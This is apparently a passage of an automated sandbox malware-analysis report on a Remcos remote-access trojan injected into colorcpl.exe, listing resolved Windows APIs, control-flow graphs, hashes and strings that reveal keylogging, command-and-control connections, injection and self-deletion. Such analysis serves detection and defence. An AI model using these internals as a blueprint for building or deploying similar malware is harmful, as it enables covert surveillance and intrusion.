                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 066E12E2
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 066E12F2
                                                                                                                              • LoadLibraryA.KERNEL32(00082038,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 066E1439
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual$LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2441068224-0
                                                                                                                              • Opcode ID: 1139d058a2ab0270ae70c86ed3c0f96bdf73f9945fbfdf2b487f088f3a0b9c69
                                                                                                                              • Instruction ID: cdc6d47b384f28a8fa39979240c0782e987281868616c3b7a3fcb2abaedbcd73
                                                                                                                              • Opcode Fuzzy Hash: 1139d058a2ab0270ae70c86ed3c0f96bdf73f9945fbfdf2b487f088f3a0b9c69
                                                                                                                              • Instruction Fuzzy Hash: EAC18A71E01205AFEB64CF69CC84BAAF7B5FF46310F14816AE806AB755D730E911DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetUserNameW.ADVAPI32(?,0466F223), ref: 0467B642
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: NameUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2645101109-0
                                                                                                                              • Opcode ID: 2da5f0c484be184e0a79c8afc6df0243bd8b5b848a203aceef572c509e7b85cb
                                                                                                                              • Instruction ID: a212aa3aa75feed684c2c620f89847088806f875be8e452d0a5ff4de32b2482e
                                                                                                                              • Opcode Fuzzy Hash: 2da5f0c484be184e0a79c8afc6df0243bd8b5b848a203aceef572c509e7b85cb
                                                                                                                              • Instruction Fuzzy Hash: 8401FF7190011CABDB04EBD4DC54AEDB7BCEF44309F10015AA506A6150FE746E89CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB65
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CB6E
                                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB85
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CB88
                                                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CB9A
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CB9D
                                                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CBAE
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CBB1
                                                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466E9E1), ref: 0467CBC3
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CBC6
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466E9E1), ref: 0467CBD2
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CBD5
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466E9E1), ref: 0467CBE6
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CBE9
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466E9E1), ref: 0467CBFA
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CBFD
                                                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466E9E1), ref: 0467CC0E
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC11
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466E9E1), ref: 0467CC22
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC25
                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466E9E1), ref: 0467CC36
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC39
                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466E9E1), ref: 0467CC4A
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC4D
                                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466E9E1), ref: 0467CC5E
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC61
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466E9E1), ref: 0467CC72
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC75
                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466E9E1), ref: 0467CC83
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC86
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0466E9E1), ref: 0467CC97
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CC9A
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0466E9E1), ref: 0467CCA7
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CCAA
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0466E9E1), ref: 0467CCB7
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CCBA
                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0466E9E1), ref: 0467CCCC
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CCCF
                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0466E9E1), ref: 0467CCDC
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CCDF
                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0466E9E1), ref: 0467CCF0
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CCF3
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0466E9E1), ref: 0467CD04
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CD07
                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0466E9E1), ref: 0467CD19
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CD1C
                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0466E9E1), ref: 0467CD29
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CD2C
                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0466E9E1), ref: 0467CD39
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CD3C
                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0466E9E1), ref: 0467CD49
                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0467CD4C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                              • API String ID: 4236061018-3687161714
                                                                                                                              • Opcode ID: 9ab4500b460eb68e600e1e4ecbfa33c698a3e4ceed5d419f7edd0439b3eb7423
                                                                                                                              • Instruction ID: dc5c681ee124bfe64f78efcbd76cd2374b483e9b5fee25fe7e176ff26f1981e0
                                                                                                                              • Opcode Fuzzy Hash: 9ab4500b460eb68e600e1e4ecbfa33c698a3e4ceed5d419f7edd0439b3eb7423
                                                                                                                              • Instruction Fuzzy Hash: 574147E0E813587BDB10ABB66D8DD2B3EACD955A95341581BB508A7500FEBCBC00DFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466E9C5 Relevance: 49.8, APIs: 15, Strings: 13, Instructions: 795COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5 466e9c5-466ea47 call 467cb50 GetModuleFileNameW call 466f3c3 call 46620f6 * 2 call 467be1b call 466fb17 call 4661e8d call 469fd00 22 466ea93-466eb5b call 4661e65 call 4661fab call 4661e65 call 466531e call 4666383 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4661fc0 call 4665aa6 call 4661e65 call 46651e3 call 4661e65 call 46651e3 5->22 23 466ea49-466ea8e call 466fbb3 call 4661e65 call 4661fab call 4670f37 call 466fb64 call 466f3b0 5->23 69 466ebae-466ebc9 call 4661e65 call 466b9bd 22->69 70 466eb5d-466eba8 call 4666c1e call 4661fe2 call 4661fd8 call 4661fab call 4673549 22->70 49 466eef2-466ef03 call 4661fd8 23->49 80 466ec03-466ec0a call 466d069 69->80 81 466ebcb-466ebea call 4661fab call 4673549 69->81 70->69 102 466f34f-466f36a call 4661fab call 46739a9 call 4672475 70->102 90 466ec13-466ec1a 80->90 91 466ec0c-466ec0e 80->91 81->80 98 466ebec-466ec02 call 4661fab call 46739a9 81->98 95 466ec1e-466ec2a call 467b2c3 90->95 96 466ec1c 90->96 94 466eef1 91->94 94->49 103 466ec33-466ec37 95->103 104 466ec2c-466ec2e 95->104 96->95 98->80 126 466f36f-466f3a0 call 467bc5e call 4661f04 call 4673a23 call 4661f09 * 2 102->126 107 466ec76-466ec89 call 4661e65 call 4661fab 103->107 108 466ec39 call 4667716 103->108 104->103 128 466ec90-466ed18 call 4661e65 call 467bc5e call 4661f13 call 4661f09 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab 107->128 129 466ec8b call 4667755 107->129 117 466ec3e-466ec40 108->117 120 466ec42-466ec47 call 4667738 call 4667260 117->120 121 466ec4c-466ec5f call 4661e65 call 4661fab 117->121 120->121 121->107 141 466ec61-466ec67 121->141 157 466f3a5-466f3af call 466dd42 call 4674f2a 126->157 177 466ed80-466ed84 128->177 178 466ed1a-466ed33 call 4661e65 call 4661fab call 469bad6 128->178 129->128 141->107 144 466ec69-466ec6f 141->144 144->107 147 466ec71 call 4667260 144->147 147->107 180 466ef06-466ef66 call 4696e90 call 466247c call 4661fab * 2 call 46736f8 call 4669057 177->180 181 466ed8a-466ed91 177->181 178->177 205 466ed35-466ed7b call 4661e65 call 4661fab call 4661e65 call 4661fab call 466da34 call 4661f13 call 4661f09 178->205 236 466ef6b-466efbf call 4661e65 call 4661fab call 4662093 call 4661fab call 467376f call 4661e65 call 4661fab call 469baac 180->236 184 466ed93-466ee0d call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 466cdf9 181->184 185 466ee0f-466ee19 call 4669057 181->185 192 466ee1e-466ee42 call 466247c call 4694798 184->192 185->192 212 466ee44-466ee4f call 4696e90 192->212 213 466ee51 192->213 205->177 215 466ee53-466ee9e call 4661f04 call 469f809 call 466247c call 4661fab call 466247c call 4661fab call 4673947 212->215 213->215 273 466eea3-466eec8 call 46947a1 call 4661e65 call 466b9bd 215->273 287 466efc1 236->287 288 466efdc-466efde 236->288 273->236 286 466eece-466eeed call 4661e65 call 467bc5e call 466f474 273->286 286->236 306 466eeef 286->306 289 466efc3-466efda call 467cd9b CreateThread 287->289 290 466efe4 288->290 291 466efe0-466efe2 288->291 294 466efea-466f0c6 call 4662093 * 2 call 467b4ef call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 469baac call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab StrToIntA call 4669de4 call 4661e65 call 4661fab 289->294 290->294 291->289 344 466f101 294->344 345 466f0c8-466f0ff call 46944ea call 4661e65 call 4661fab CreateThread 294->345 306->94 347 466f103-466f11b call 4661e65 call 4661fab 344->347 345->347 357 466f11d-466f154 call 46944ea call 4661e65 call 4661fab CreateThread 347->357 358 466f159-466f16c call 4661e65 call 4661fab 347->358 357->358 368 466f16e-466f1c7 call 4661e65 call 4661fab call 4661e65 call 4661fab call 466d9e8 call 4661f13 call 4661f09 CreateThread 358->368 369 466f1cc-466f1df call 4661e65 call 4661fab 358->369 368->369 379 466f1e1-466f215 call 4661e65 call 4661fab call 4661e65 call 4661fab call 469baac call 466c162 369->379 380 466f21a-466f23e call 467b60d call 4661f13 call 4661f09 369->380 379->380 400 466f243-466f256 CreateThread 380->400 401 466f240-466f241 SetProcessDEPPolicy 380->401 404 466f264-466f26b 400->404 405 466f258-466f262 CreateThread 400->405 401->400 408 466f26d-466f277 CreateThread 404->408 409 466f279-466f280 404->409 405->404 408->409 412 466f282-466f285 409->412 413 466f28e 409->413 415 466f287-466f28c 412->415 416 466f2cc-466f2df call 4661fab call 46734ff 412->416 418 466f293-466f2bb call 4662093 call 46652fd call 4662093 call 467b4ef 413->418 415->418 425 466f2e4-466f2e7 416->425 433 466f2c0-466f2c7 call 4661fd8 418->433 425->157 427 466f2ed-466f32d call 467bc5e call 4661f04 call 467361b call 4661f09 call 4661f04 425->427 443 466f346-466f34b DeleteFileW 427->443 433->416 444 466f32f-466f332 443->444 445 466f34d 443->445 444->126 446 466f334-466f341 Sleep call 4661f04 444->446 445->126 446->443
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB65
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB6E
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466E9E1), ref: 0467CB85
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB88
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CB9A
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CB9D
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466E9E1), ref: 0467CBAE
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBB1
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466E9E1), ref: 0467CBC3
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBC6
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466E9E1), ref: 0467CBD2
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBD5
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466E9E1), ref: 0467CBE6
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBE9
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466E9E1), ref: 0467CBFA
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CBFD
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466E9E1), ref: 0467CC0E
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC11
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466E9E1), ref: 0467CC22
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC25
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466E9E1), ref: 0467CC36
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC39
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466E9E1), ref: 0467CC4A
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC4D
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466E9E1), ref: 0467CC5E
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC61
                                                                                                                                • Part of subcall function 0467CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466E9E1), ref: 0467CC72
                                                                                                                                • Part of subcall function 0467CB50: GetProcAddress.KERNEL32(00000000), ref: 0467CC75
                                                                                                                                • Part of subcall function 0467CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466E9E1), ref: 0467CC83
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 0466E9EE
                                                                                                                                • Part of subcall function 04670F37: __EH_prolog.LIBCMT ref: 04670F3C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                              • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                              • API String ID: 2830904901-2432426600
                                                                                                                              • Opcode ID: 5d10aabbd5b5b51d3b1a167b60107c5af56db5070779b7d339fa3a3ab4ddfdb3
                                                                                                                              • Instruction ID: 1b446ea334b46e4c70d90c7fe3c8ab03f9cd105559bad45cf0f8717b0e8ab983
                                                                                                                              • Opcode Fuzzy Hash: 5d10aabbd5b5b51d3b1a167b60107c5af56db5070779b7d339fa3a3ab4ddfdb3
                                                                                                                              • Instruction Fuzzy Hash: 3432E560F043446BFB18BB70DC65ABE26D99F82A4CF40082DE5439B2C1FE69FD058799
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04674F2A Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 809sleepnetworkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 448 4674f2a-4674f72 call 46620df call 467b8b3 call 46620df call 4661e65 call 4661fab call 469baac 461 4674f74-4674f7b Sleep 448->461 462 4674f81-4674fcd call 4662093 call 4661e65 call 46620f6 call 467be1b call 466489e call 4661e65 call 466b9bd 448->462 461->462 477 4675041-46750dc call 4662093 call 4661e65 call 46620f6 call 467be1b call 4661e65 * 2 call 4666c1e call 4662f10 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4665b05 462->477 478 4674fcf-467503e call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 466473d 462->478 531 46750de-46750ea 477->531 532 46750ec-46750f3 477->532 478->477 533 46750f8-467518a call 4665aa6 call 466531e call 4666383 call 4662f10 call 4662093 call 467b4ef call 4661fd8 * 2 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4674ee9 531->533 532->533 560 46751d5-46751e3 call 466482d 533->560 561 467518c-46751d0 WSAGetLastError call 467cae1 call 46652fd call 4662093 call 467b4ef call 4661fd8 533->561 566 46751e5-467520b call 4662093 * 2 call 467b4ef 560->566 567 4675210-4675225 call 4664f51 call 46648c8 560->567 582 4675aa3-4675ab5 call 4664e26 call 46621fa 561->582 566->582 567->582 583 467522b-467537e call 4661e65 * 2 call 466531e call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662093 call 467b4ef call 4661fd8 * 4 call 467b7e0 call 46745bd call 466905c call 46a1e81 call 4661e65 call 46620f6 call 466247c call 4661fab * 2 call 46736f8 567->583 597 4675ab7-4675ad7 call 4661e65 call 4661fab call 469baac Sleep 582->597 598 4675add-4675ae5 call 4661e8d 582->598 648 4675392-46753b9 call 4661fab call 46735a6 583->648 649 4675380-467538d call 4665aa6 583->649 597->598 598->477 655 46753c0-4675a0a call 466417e call 466dd89 call 467bc42 call 467bd1e call 467bb8e call 4661e65 GetTickCount call 467bb8e call 467bae6 call 467bb8e * 2 call 467ba96 call 467bd1e * 5 call 466f8d1 call 467bd1e call 4662f31 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 3 call 4662ea1 call 4662f10 call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4666383 call 4662f10 * 5 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 7 call 4662ea1 call 4664aa1 call 4661fd8 * 50 call 4661f09 call 4661fd8 * 6 call 4661f09 call 4664c10 648->655 656 46753bb-46753bd 648->656 649->648 901 4675a0f-4675a16 655->901 656->655 902 4675a2a-4675a31 901->902 903 4675a18-4675a1f 901->903 905 4675a33-4675a38 call 466b051 902->905 906 4675a3d-4675a6f call 4665a6b call 4662093 * 2 call 467b4ef 902->906 903->902 904 4675a21-4675a23 903->904 904->902 905->906 917 4675a83-4675a9e call 4661fd8 * 2 call 4661f09 906->917 918 4675a71-4675a7d CreateThread 906->918 917->582 918->917
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,00000029,046D52F0,046D50E4,00000000), ref: 04674F7B
                                                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0467518C
                                                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 04675AD7
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                              • String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                                                                              • API String ID: 524882891-4164695623
                                                                                                                              • Opcode ID: 7f4cb071d50c5748074244e13730a8d760f2f9d9dd80ab1bc5ebfc1383e73498
                                                                                                                              • Instruction ID: 5cbb542297091afe36e7cb6c44b9bdc9daff0095f29c38e5f60638603ab31989
                                                                                                                              • Opcode Fuzzy Hash: 7f4cb071d50c5748074244e13730a8d760f2f9d9dd80ab1bc5ebfc1383e73498
                                                                                                                              • Instruction Fuzzy Hash: 2D524871E001185BEB18FB31EDA5AFEB3A59F51208F6045ADD40BA7194FF307E868E58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0467D5DA
                                                                                                                              • GetCursorPos.USER32(?), ref: 0467D5E9
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0467D5F2
                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0467D60C
                                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,046D4B48), ref: 0467D65D
                                                                                                                              • ExitProcess.KERNEL32 ref: 0467D665
                                                                                                                              • CreatePopupMenu.USER32 ref: 0467D66B
                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0467D680
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                              • String ID: Close
                                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                                              • Opcode ID: f0d7cd0e4e33d531f39cd141e6bdc56415a88738747208261bcf36f09bf4c932
                                                                                                                              • Instruction ID: 0ea0785f50971b5e6056fbb673bcd58ebcf8da7367435c1ffb931cf1af3f040e
                                                                                                                              • Opcode Fuzzy Hash: f0d7cd0e4e33d531f39cd141e6bdc56415a88738747208261bcf36f09bf4c932
                                                                                                                              • Instruction Fuzzy Hash: 352148B1600208EFEB194FA4ED4EB693F75FF19341F001514F60AA11A0FB79ADA4EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046648C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • connect.WS2_32(?,?,?), ref: 046648E0
                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A00
                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A0E
                                                                                                                              • WSAGetLastError.WS2_32(?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A21
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                              • API String ID: 994465650-2151626615
